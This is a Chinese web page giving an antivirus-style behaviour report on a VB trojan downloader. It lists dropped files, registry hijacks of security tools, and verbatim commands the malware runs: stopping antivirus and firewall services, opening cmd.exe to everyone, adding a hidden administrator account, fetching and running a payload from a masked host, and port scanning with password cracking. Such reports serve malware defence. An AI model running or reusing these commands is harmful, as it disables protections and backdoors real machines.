| 導購 | 订阅 | 在线投稿
分享
 
 
當前位置: 王朝網路 >> vb >> Win32.Troj.Downloader.vb.81920
 

Win32.Troj.Downloader.vb.81920

2008-08-14 23:09:38  編輯來源:互聯網  简体版  手機版  評論  字體: ||
 
 
  病毒名稱(中文):

  肉雞獵人81920

  病毒別名:

  

  

  威脅級別:

  ★★☆☆☆

  病毒類型:

  木馬下載器

  病毒長度:

  81920

  影響系統:

  Win9xWinMeWinNTWin2000WinXPWin2003

  

  病毒行爲:

  這是一個木馬下載器病毒。病毒爲了隱藏自己,所取的病毒名描述信息都比較象系統正常信息。它除了會下載大量其它病毒外,還會嚴重破壞系統,關閉部分安全軟件,映像劫持大量軟件,並試圖建立後門。

  1.釋放病毒文件

  C:\Por.aed

  C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\2PF3QNZE\CA05MZGT.htm

  C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\C4DGV5NI\gx[1].jpg

  C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\R146ZVU7\notepde[1].jpg

  C:\ProgramFiles\360safe\safemon\safemes.dll

  C:\WINDOWS\SoundMan.exe

  C:\WINDOWS\system32\interne.exe

  C:\WINDOWS\system32\Man.exe

  C:\WINDOWS\system32\no1.ini

  C:\WINDOWS\system32\note2.ini

  C:\WINDOWS\system32\notepde.exe

  C:\WINDOWS\system32\qoq.exe

  C:\WINDOWS\system32\ttjj5.ini

  2.創建服務並開啓來加載文件,使其隨系統啓動

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoundManSoundMan.exe

  映像劫持大量程序,添加360Loader.exe360Safe.exe360tray.exeIceSwordIparmor.exekmailmon.exerasruniep

  鏡象劫持爲"Debugger"="svchost.exe"添加ctfmon.exe爲"Debugger"="SoundMan.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exeDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exeDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exeDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exeDebugger"SoundMan.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSword

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSwordDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exeDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exeDebugger"svchost.exe"

  .

  .

  .

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ras

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\rasDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiep

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiepDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exeDebugger"svchost.exe"

  修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL不顯示隱藏文件

  刪除安全軟件的啓動項

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunkavKavPFWvptrayruneipRavTaskRfwMain360Loader.exeras360Safe.exe360Safetray

  3.病毒生成文件中的網址由解密字符串得到

  CA05MZGT.htm

  gx[1].jpg

  notepde[1].jpg

  4.枚舉進程判定當前進程裏是否有"fint2005.exe""ehsniffer.exe""iris.exe"嗅探工具,不管有無都等待10分鍾,連接網絡

  InternetOpenUrlA讀取InternetReadFilehttp://xxxxxxxx.com/rc/1500/gx[1].txt裏面的列表,下載http://xxxxxx.com/rc/1500/gx[1].jpg

  到c:\\windows\system32\vbb.exe運行

  "cacls.exeC:\WINDOWS\system32\cmd.exe/e/t/geveryone:F"給everyone用戶組(就是所有人)對cmd.exe的完全控制,

  cmd.exe/cnetstopwscsvc&netstopsharedaccess&scconfigsharedaccessstart=disabled&scconfigwscsvc

  start=disabled&netstopKPfwSvc&netstopKWatchsvc&netstopMcShield&netstop"NortonAntiVirusServer"

  停止安全軟件的服務。

  5.搜索進程中是否含有kmailmon.exekavstart.exeshstat.exeruniep.exeras.exeMPG4C32.exeimsins.exeIparmor.exe

  360safe.exe360tray.execacls.execcenter.exe用TerminateProcess來結束

  6."cmd.exe/cnetusernew112369/add&

  netusernew112369&

  netusernew1/active:yes&

  netlocalgroupadministrators/add

  添加一個new1治理員帳號密碼12369,將這些信息寫入%windir%\1.inf,然後調用rundll32.exe來修改HelpandSupport服務

  C:\WINDOWS\system32\interne.exe,並刪除1.inf.關閉臨時登陸用戶new1

  "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1"添加建值爲0,(1爲開啓)

  不能創建刪除用戶"cmd.exe/cnetusernew1/del"

  7.訪問"http://webipcha.cn/ip/ip.asp"獲取當前外網IP,"cmd/crouteprint|find"DefaultGateway:">c:\ip.txt"

  獲取網關地址到c:\ip.txt,然後從文件重讀出網關地址,刪除文件。

  8.判定當前進程有沒有avp.exe有了修改日期2001年7月15日

  9.釋放掃描器qoq.exe(DotpotPortReadyVer1.6)到%windir%/system32/下,掃描網關上下C段的所有135端口開放的主機,

  記錄到Por.aed,掃描外網C段上4個段位的ip,"cmd.exe/cmove"c:\Por.aed""%SystemRoot%\system32\Por.aed"&exit"

  10.釋放popo.exe到病毒運行當前目錄讀取Por.aed掃描出來的開135的IP地址"cmd.exe/cstartC:\\popo.exeip&exit"

  (如cmd.exe/cstartC:\\popo.exe192.1**.18.15&exit通過POPO.EXE進行掃字典密碼破解)

  11.掃描完畢刪除qoq.exe,Por.aed,popo.exe
 
 
 
上一篇《Win32.Troj.AutoRun.vb.73728》
下一篇《VBS.Downloader.v.1320》
 
 
 
 
 
 
日版寵物情人插曲《Winding Road》歌詞

日版寵物情人2017的插曲,很帶節奏感,日語的,女生唱的。 最後聽見是在第8集的時候女主手割傷了,然後男主用嘴幫她吸了一下,插曲就出來了。 歌手:Def...

兄弟共妻,我成了他們夜裏的美食

老鍾家的兩個兒子很特別,就是跟其他的人不太一樣,魔一般的執著。兄弟倆都到了要結婚的年齡了,不管自家老爹怎麽磨破嘴皮子,兄弟倆說不娶就不娶,老父母爲兄弟兩操碎了心...

如何磨出破洞牛仔褲?牛仔褲怎麽剪破洞?

把牛仔褲磨出有線的破洞 1、具體工具就是磨腳石,下面墊一個硬物,然後用磨腳石一直磨一直磨,到把那塊磨薄了,用手撕開就好了。出來的洞啊很自然的。需要貓須的話調幾...

我就是掃描下圖得到了敬業福和愛國福

先來看下敬業福和愛國福 今年春節,支付寶再次推出了“五福紅包”活動,表示要“把欠大家的敬業福都還給大家”。 今天該活動正式啓動,和去年一樣,需要收集“五福”...

冰箱異味産生的原因和臭味去除的方法

有時候我們打開冰箱就會聞到一股異味,冰箱裏的這種異味是因爲一些物質發出的氣味的混合體,聞起來讓人惡心。 産生這些異味的主要原因有以下幾點。 1、很多人有這種習...

《極品家丁》1-31集大結局分集劇情介紹

簡介 《極品家丁》講述了現代白領林晚榮無意回到古代金陵,並追隨蕭二小姐化名“林三”進入蕭府,不料卻陰差陽錯上演了一出低級家丁拼搏上位的“林三升職記”。...

李溪芮《極品家丁》片尾曲《你就是我最愛的寶寶》歌詞

你就是我最愛的寶寶 - 李溪芮 (電視劇《極品家丁》片尾曲) 作詞:常馨內 作曲:常馨內 你的眉 又鬼馬的挑 你的嘴 又壞壞的笑 上一秒吵鬧 下...

烏梅的功效與作用以及烏梅的食用禁忌有哪些?

烏梅,又稱春梅,中醫認爲,烏梅味酸,性溫,無毒,具有安心、除熱、下氣、祛痰、止渴調中、殺蟲的功效,治肢體痛、肺痨病。烏梅泡水喝能治傷寒煩熱、止吐瀉,與幹姜一起制...

什麽是脂肪粒?如何消除臉部脂肪粒?

什麽是脂肪粒 在我們的臉上總會長一個個像脂肪的小顆粒,弄也弄不掉,而且顔色還是白白的。它既不是粉刺也不是其他的任何痘痘,它就是脂肪粒。 脂肪粒雖然也是由油脂...

網絡安全治理:國家安全保障的主要方向是打擊犯罪,而不是處置和懲罰受害者

來源:中國青年報 新的攻擊方法不斷湧現,黑客幾乎永遠占據網絡攻擊的上風,我們不可能通過技術手段杜絕網絡攻擊。國家安全保障的主要方向是打擊犯罪,而不是處置和懲罰...

河南夫妻在溫嶺網絡直播“造人”內容涉黃被刑事拘留

夫妻網絡直播“造人”爆紅   1月9日,溫嶺城北派出所接到南京警方的協查通告,他們近期打掉了一個涉黃直播APP平台。而根據掌握的線索,其中有一對涉案的夫妻主播...

如何防止牆紙老化?牆紙變舊變黃怎麽辦?

如何防止牆紙老化? (1)選擇透氣性好的牆紙 市場上牆紙的材質分無紡布的、木纖維的、PVC的、玻璃纖維基材的、布面的等,相對而言,PVC材質的牆紙最不透氣...

鮮肌之謎非日本生産VS鮮肌之謎假日貨是謠言

觀點一:破日本銷售量的“鮮肌之謎” 非日本生産 近一段時間,淘寶上架了一款名爲“鮮肌之謎的” 鲑魚卵巢美容液,號稱是最近日本的一款推出的全新護膚品,産品本身所...

中國最美古詩詞精選摘抄

系腰裙(北宋詞人 張先) 惜霜蟾照夜雲天,朦胧影、畫勾闌。人情縱似長情月,算一年年。又能得、幾番圓。 欲寄西江題葉字,流不到、五亭前。東池始有荷新綠,尚小如...

關于女人的經典語句

關于女人的經典語句1、【做一個獨立的女人】 思想獨立:有主見、有自己的人生觀、價值觀。有上進心,永遠不放棄自己的理想,做一份自己喜愛的事業,擁有快樂和成就...

未來我們可以和性愛機器人結婚嗎?

你想體驗機器人性愛嗎?你想和性愛機器人結婚嗎?如果你想,機器人有拒絕你的權利嗎? 近日,第二屆“國際人類-機器人性愛研討會”大會在倫敦金史密斯大學落下帷幕。而...

全球最變態的十個地方

10.土耳其地下洞穴城市 變態指數:★★☆☆☆ 這是土耳其卡帕多西亞的一個著名景點,傳說是當年基督教徒們爲了躲避戰爭而在此修建。裏面曾住著20000人,...

科學家稱,人類死亡後意識將在另外一個宇宙中繼續存活

據英國《每日快報》報道,一位科學家兼理論家Robert Lanza博士宣稱,世界上並不存在人類死亡,死亡的只是身體。他認爲我們的意識借助我們體內的能量生存,而且...

《屏裏狐》片頭曲《我愛狐狸精》歌詞是什麽?

《我愛狐狸精》 - 劉馨棋   (電視劇《屏裏狐》主題曲)   作詞:金十三&李旦   作曲:劉嘉   狐狸精 狐狸仙   千年修...

 
 
 
病毒名稱(中文): 肉雞獵人81920 病毒別名: 威脅級別: ★★☆☆☆ 病毒類型: 木馬下載器 病毒長度: 81920 影響系統: Win9xWinMeWinNTWin2000WinXPWin2003 病毒行爲: 這是一個木馬下載器病毒。病毒爲了隱藏自己,所取的病毒名描述信息都比較象系統正常信息。它除了會下載大量其它病毒外,還會嚴重破壞系統,關閉部分安全軟件,映像劫持大量軟件,並試圖建立後門。 1.釋放病毒文件 C:\Por.aed C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\2PF3QNZE\CA05MZGT.htm C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\C4DGV5NI\gx[1].jpg C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\R146ZVU7\notepde[1].jpg C:\ProgramFiles\360safe\safemon\safemes.dll C:\WINDOWS\SoundMan.exe C:\WINDOWS\system32\interne.exe C:\WINDOWS\system32\Man.exe C:\WINDOWS\system32\no1.ini C:\WINDOWS\system32\note2.ini C:\WINDOWS\system32\notepde.exe C:\WINDOWS\system32\qoq.exe C:\WINDOWS\system32\ttjj5.ini 2.創建服務並開啓來加載文件,使其隨系統啓動 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoundManSoundMan.exe 映像劫持大量程序,添加360Loader.exe360Safe.exe360tray.exeIceSwordIparmor.exekmailmon.exerasruniep 鏡象劫持爲"Debugger"="svchost.exe"添加ctfmon.exe爲"Debugger"="SoundMan.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exe Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exe Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exe Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exe Debugger "SoundMan.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSword HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSword Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exe Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exe Debugger "svchost.exe" . . . HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ras HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ras Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiep HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiep Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exe Debugger "svchost.exe" 修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL不顯示隱藏文件 刪除安全軟件的啓動項 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunkavKavPFWvptrayruneipRavTaskRfwMain360Loader.exeras360Safe.exe360Safetray 3.病毒生成文件中的網址由解密字符串得到 CA05MZGT.htm gx[1].jpg notepde[1].jpg 4.枚舉進程判定當前進程裏是否有"fint2005.exe""ehsniffer.exe""iris.exe"嗅探工具,不管有無都等待10分鍾,連接網絡 InternetOpenUrlA讀取InternetReadFilehttp://xxxxxxxx.com/rc/1500/gx[1].txt裏面的列表,下載http://xxxxxx.com/rc/1500/gx[1].jpg 到c:\\windows\system32\vbb.exe運行 "cacls.exeC:\WINDOWS\system32\cmd.exe/e/t/geveryone:F"給everyone用戶組(就是所有人)對cmd.exe的完全控制, cmd.exe/cnetstopwscsvc&netstopsharedaccess&scconfigsharedaccessstart=disabled&scconfigwscsvc start=disabled&netstopKPfwSvc&netstopKWatchsvc&netstopMcShield&netstop"NortonAntiVirusServer" 停止安全軟件的服務。 5.搜索進程中是否含有kmailmon.exekavstart.exeshstat.exeruniep.exeras.exeMPG4C32.exeimsins.exeIparmor.exe 360safe.exe360tray.execacls.execcenter.exe用TerminateProcess來結束 6."cmd.exe/cnetusernew112369/add& netusernew112369& netusernew1/active:yes& netlocalgroupadministrators/add 添加一個new1治理員帳號密碼12369,將這些信息寫入%windir%\1.inf,然後調用rundll32.exe來修改HelpandSupport服務 C:\WINDOWS\system32\interne.exe,並刪除1.inf.關閉臨時登陸用戶new1 "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1"添加建值爲0,(1爲開啓) 不能創建刪除用戶"cmd.exe/cnetusernew1/del" 7.訪問"http://webipcha.cn/ip/ip.asp"獲取當前外網IP,"cmd/crouteprint|find"DefaultGateway:">c:\ip.txt" 獲取網關地址到c:\ip.txt,然後從文件重讀出網關地址,刪除文件。 8.判定當前進程有沒有avp.exe有了修改日期2001年7月15日 9.釋放掃描器qoq.exe(DotpotPortReadyVer1.6)到%windir%/system32/下,掃描網關上下C段的所有135端口開放的主機, 記錄到Por.aed,掃描外網C段上4個段位的ip,"cmd.exe/cmove"c:\Por.aed""%SystemRoot%\system32\Por.aed"&exit" 10.釋放popo.exe到病毒運行當前目錄讀取Por.aed掃描出來的開135的IP地址"cmd.exe/cstartC:\\popo.exeip&exit" (如cmd.exe/cstartC:\\popo.exe192.1**.18.15&exit通過POPO.EXE進行掃字典密碼破解) 11.掃描完畢刪除qoq.exe,Por.aed,popo.exe
󰈣󰈤
 
 
 
  免責聲明:本文僅代表作者個人觀點,與王朝網路無關。王朝網路登載此文出於傳遞更多信息之目的,並不意味著贊同其觀點或證實其描述,其原創性以及文中陳述文字和內容未經本站證實,對本文以及其中全部或者部分內容、文字的真實性、完整性、及時性本站不作任何保證或承諾,請讀者僅作參考,並請自行核實相關內容。
 
 
小龍女彤彤之情溢皇都
龔潔
智能手機形象美女
崔潔彤
回家的路上----
中國一站(哈爾濱)
清明植物園的花。
桃花堤印象之豎版
 
>>返回首頁<<
 
 熱帖排行
 
 
 
 
© 2005- 王朝網路 版權所有